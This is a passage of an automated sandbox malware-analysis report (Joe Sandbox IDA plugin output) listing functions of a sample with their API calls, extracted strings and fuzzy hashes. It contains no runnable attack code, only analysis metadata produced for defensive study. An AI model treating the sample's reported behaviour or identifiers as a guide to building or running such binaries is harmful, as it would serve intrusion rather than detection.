Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715940cba0660c19886b1e3f3147e416a4f16fe9c574c02fba393d6d62a1498e
Instruction ID: 8a07fd26a69e024d5d2cba32e5776d4894a7bd5a1b114b142d5d6f5e01302194
Opcode Fuzzy Hash: 715940cba0660c19886b1e3f3147e416a4f16fe9c574c02fba393d6d62a1498e
Instruction Fuzzy Hash: 35614A7164C709E7DE785A388865BFE6398EBC1700F1C091AE887DB281DA11DE41DB79

Function 00DB7738 Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 9aec7f8d6a81a002cc303caaf583d5f584a3840b11002ef3fa415b5bf9a3e7bc
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: BF514565A0C745DBDB384968856ABFE2799DBD1300F1C0909E883DB282DE05DD45D7B2

Function 00DA0FAC Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc01bc57b24830671f8a9fd5fb37d8c1dfb3cab1dd2f3ea3b83dfcb942fc116e
Instruction ID: 7474dd30bdf00f45ce572a2ec75a613cd7fc22330fb919ccd8bc5980cf7b3203
Opcode Fuzzy Hash: fc01bc57b24830671f8a9fd5fb37d8c1dfb3cab1dd2f3ea3b83dfcb942fc116e
Instruction Fuzzy Hash: 0151C4395083D54FC711DF3885405BEBFE0AFAB314F4A499AE5D94B242D221D68ACB72

Function 00DA2125 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c9e481e66861e601e501c991c738560d9cb5e6b5251f7dfb914c2d61b0577a
Instruction ID: b30fe92fbf4d06ec83b75e75259661cab6707681ae71955c83c0beb7f72fc1bd
Opcode Fuzzy Hash: 84c9e481e66861e601e501c991c738560d9cb5e6b5251f7dfb914c2d61b0577a
Instruction Fuzzy Hash: 6851DFB1A087119FC758CF29D88055AF7E1FF88314F058A2EE899E7340DB31E959CB96

Function 00DA5E86 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
Instruction ID: ec3f4c74adf6436366d510158097e8ff07986f29f6b77bc1408820d4de25bf18
Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
Instruction Fuzzy Hash: 0031E1B1618B168FCB14DF28D85116EBBE0EF9A300F14492EF495C7742C735E909CBA1

Function 00DA0244 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DA0284

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

Part of subcall function 00DA3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00D9F801,00000000,00000000,?,00DD5070,?,00D9F801,?,?,00000050,?), ref: 00DA3F64

_strlen.LIBCMT ref: 00DA02A5
SetDlgItemTextW.USER32(?,00DD2274,?), ref: 00DA02FE
GetWindowRect.USER32(?,?), ref: 00DA0334
GetClientRect.USER32(?,?), ref: 00DA0340
GetWindowLongW.USER32(?,000000F0), ref: 00DA03EB
GetWindowRect.USER32(?,?), ref: 00DA041B
SetWindowTextW.USER32(?,?), ref: 00DA044A
GetSystemMetrics.USER32(00000008), ref: 00DA0452
GetWindow.USER32(?,00000005), ref: 00DA045D
GetWindowRect.USER32(00000000,?), ref: 00DA048D
GetWindow.USER32(00000000,00000002), ref: 00DA04FF

Strings

$%s:, xrefs: 00DA026D
d, xrefs: 00DA0360
CAPTION, xrefs: 00DA0432

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 240fafffcd6ee00bcded39e58b994d59b2d5521640ecf0b29e62b57c459c1006
Instruction ID: 66fdd918168b153ce47a4713b145479f1acc1ee598011a10e5f4447c869a7fb5
Opcode Fuzzy Hash: 240fafffcd6ee00bcded39e58b994d59b2d5521640ecf0b29e62b57c459c1006
Instruction Fuzzy Hash: 33819B72608301AFD714DF68CD89A6FBBE9EB89704F04591DFA85D3290D774E908CB62

Function 00DBF172 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00DBF1B6

Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED6E
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED80
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED92
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDA4
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDB6
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDC8
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDDA
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDEC
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDFE
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE10
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE22
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE34
Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE46

_free.LIBCMT ref: 00DBF1AB

Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22

_free.LIBCMT ref: 00DBF1CD
_free.LIBCMT ref: 00DBF1E2
_free.LIBCMT ref: 00DBF1ED
_free.LIBCMT ref: 00DBF20F
_free.LIBCMT ref: 00DBF222
_free.LIBCMT ref: 00DBF230
_free.LIBCMT ref: 00DBF23B
_free.LIBCMT ref: 00DBF273
_free.LIBCMT ref: 00DBF27A
_free.LIBCMT ref: 00DBF297
_free.LIBCMT ref: 00DBF2AF

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f3915e750eee278e819c06d965ba71c1e7958700fe632242f81b543e4713dded
Instruction ID: 22bbb6c1be53d54a079ac20423cd324784e5b9d6f1c6ec59300a5dd83cba7a83
Opcode Fuzzy Hash: f3915e750eee278e819c06d965ba71c1e7958700fe632242f81b543e4713dded
Instruction Fuzzy Hash: 33310631A00705DFEB21AB69DC45BDA77E9FF01360F28492AE44BD6151DFB1AD40CA34

Function 00DAF9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00DAFA20
GetClassNameW.USER32(00000000,?,00000800), ref: 00DAFA4C

Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E

GetWindowLongW.USER32(00000000,000000F0), ref: 00DAFA68
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DAFA7F
GetObjectW.GDI32(00000000,00000018,?), ref: 00DAFA93
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DAFABC
DeleteObject.GDI32(00000000), ref: 00DAFAC3
GetWindow.USER32(00000000,00000002), ref: 00DAFACC

Strings

STATIC, xrefs: 00DAFA52

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 4096f3360aeb2abdf2c8046639eca6a23dcb92993736c729ddd8adac7dca84ff
Instruction ID: 3ae97e65bf3bfa65cddb2b873c91dfdae638324f8ec8f020663f35e23fb634de
Opcode Fuzzy Hash: 4096f3360aeb2abdf2c8046639eca6a23dcb92993736c729ddd8adac7dca84ff
Instruction Fuzzy Hash: 3E212236644720BBE220ABB0DC4AFFF77ACEF4A710F044425F945E6291DBB4990686B5

Function 00DBB8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DBB8C5

Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22

_free.LIBCMT ref: 00DBB8D1
_free.LIBCMT ref: 00DBB8DC
_free.LIBCMT ref: 00DBB8E7
_free.LIBCMT ref: 00DBB8F2
_free.LIBCMT ref: 00DBB8FD
_free.LIBCMT ref: 00DBB908
_free.LIBCMT ref: 00DBB913
_free.LIBCMT ref: 00DBB91E
_free.LIBCMT ref: 00DBB92C

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ac97ac4bd915b421f97649a3f8f1d3fc84355939f37067dd22667015646b98f1
Instruction ID: 7f3d99abb917cad071c340df0776c1bb296525a0f2b4ac8de86ed77b4a25a0de
Opcode Fuzzy Hash: ac97ac4bd915b421f97649a3f8f1d3fc84355939f37067dd22667015646b98f1
Instruction Fuzzy Hash: EA116979910248EFCB01EF59C992CD93F75EF04360B518066F90A8B122DBF1DA51DBA0

Function 00DB5451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00DB5570
___TypeMatch.LIBVCRUNTIME ref: 00DB567E
_UnwindNestedFrames.LIBCMT ref: 00DB57D0
CallUnexpected.LIBVCRUNTIME ref: 00DB57EB
_abort.LIBCMT ref: 00DB57F0

Strings

csm, xrefs: 00DB548E
csm, xrefs: 00DB54FB
csm, xrefs: 00DB55A7

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 37c1768844366bd1eae6b4676c18b58c5d8cdb8e2f957ed3482965da3217dd4a
Instruction ID: 0eee915df5d07e44ca93d9ea33352443cd30ec74b79702cb1fd2a09b09fb8805
Opcode Fuzzy Hash: 37c1768844366bd1eae6b4676c18b58c5d8cdb8e2f957ed3482965da3217dd4a
Instruction Fuzzy Hash: D7B17D71900A09EFCF25DFA4E881AEEB7B5FF04311B18455AE8026B21ADB31D951CFB1

Function 00DAB631 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DAB656
_wcslen.LIBCMT ref: 00DAB6F6
GlobalAlloc.KERNEL32(00000040,?), ref: 00DAB705
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DAB726

Strings

utf-8"></head>, xrefs: 00DAB68B
</html>, xrefs: 00DAB6D7
<html>, xrefs: 00DAB675, 00DAB6AE
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00DAB680

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 1b8d01e030915b2b6807597f1398dbd2b31636f9a3a8f7cced272309fbcd1f4c
Instruction ID: 14616004c9b05221fb3f1a046e6c7d3f1e23cf772bdb2b92cef3d704b49bded6
Opcode Fuzzy Hash: 1b8d01e030915b2b6807597f1398dbd2b31636f9a3a8f7cced272309fbcd1f4c
Instruction Fuzzy Hash: 9131F732108342BEE715AB34DC06FAB775CDF96730F18051EF50196193EBA4D94A87B5

Function 00DAD8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

EndDialog.USER32(?,00000001), ref: 00DAD910
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DAD937
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DAD950
SetWindowTextW.USER32(?,?), ref: 00DAD961
GetDlgItem.USER32(?,00000065), ref: 00DAD96A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DAD97E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DAD994

Strings

LICENSEDLG, xrefs: 00DAD8D4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 0236682a997c6ba72392cf460c685af4f3ea725a656b3482c19f5dde9219eb4f
Instruction ID: 0168d40a6c61e45fd2f9d30cdbaaa72577bb76f9bb1d44a71dc38a058261d99d
Opcode Fuzzy Hash: 0236682a997c6ba72392cf460c685af4f3ea725a656b3482c19f5dde9219eb4f
Instruction Fuzzy Hash: 4B21A132204304BBD7115F65EC49FBB3B6EEB4BB85F058019F642E66A0CB62DA05DA31

Function 00D9BF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D9BFA3

Part of subcall function 00DA34D7: GetSystemTime.KERNEL32(?,00000000), ref: 00DA34EF
Part of subcall function 00DA34D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA34FD

Part of subcall function 00DA3480: __aulldiv.LIBCMT ref: 00DA3489

__aulldiv.LIBCMT ref: 00D9BFCF
GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 00D9BFD6
_swprintf.LIBCMT ref: 00D9C001

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

_wcslen.LIBCMT ref: 00D9C00B
_swprintf.LIBCMT ref: 00D9C061
_wcslen.LIBCMT ref: 00D9C06B

Strings

%u.%03u, xrefs: 00D9BFF1, 00D9C055

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
String ID: %u.%03u
API String ID: 2956649372-1114938957
Opcode ID: 72aaec6042322c5d276b131d8689a0a4f56f09de3823a7fa019045d6a72c07df
Instruction ID: 9d9d5b9f6bed39df752901fe924977a0aea7d04b8657c36a5e7d093998b4b462
Opcode Fuzzy Hash: 72aaec6042322c5d276b131d8689a0a4f56f09de3823a7fa019045d6a72c07df
Instruction Fuzzy Hash: 03215272A14345AFCB24EF69CC45EABB7DDEB84740F44492EF449D3242DA34D90887B2

Function 00DACBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACBEE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DACC05
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DACC19
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACC2A
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DACC42
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00DACC66
_swprintf.LIBCMT ref: 00DACC85

Strings

%s %s, xrefs: 00DACC7C

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 8a1d4e1ad3bccfcb12d20610d956c77e73315d9714ac130298d17dec33900c9d
Instruction ID: 98dd0d889828305f80b42cadbedbe947ce50c9e571f0f607829dee850cd3631a
Opcode Fuzzy Hash: 8a1d4e1ad3bccfcb12d20610d956c77e73315d9714ac130298d17dec33900c9d
Instruction Fuzzy Hash: A521F8B290024EABDB21DFA1DD44EEA77BCEB49305F104566BA1AD7112E630DA05CB70

Function 00DB2360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00D9CEA9,00D9CEAB,00000000,00000000,E7604376,00000001,00000000,00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB23E9
MultiByteToWideChar.KERNEL32(00000000,00000000,00D9CEA9,?,00000000,00000000,?,?,00D9CD87,?,00000004,00D9CEA9), ref: 00DB2464
SysAllocString.OLEAUT32(00000000), ref: 00DB246F
_com_issue_error.COMSUPP ref: 00DB2498
_com_issue_error.COMSUPP ref: 00DB24A2
GetLastError.KERNEL32(80070057,E7604376,00000001,00000000,00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB24A7
_com_issue_error.COMSUPP ref: 00DB24BA
GetLastError.KERNEL32(00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB24D0
_com_issue_error.COMSUPP ref: 00DB24E3

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
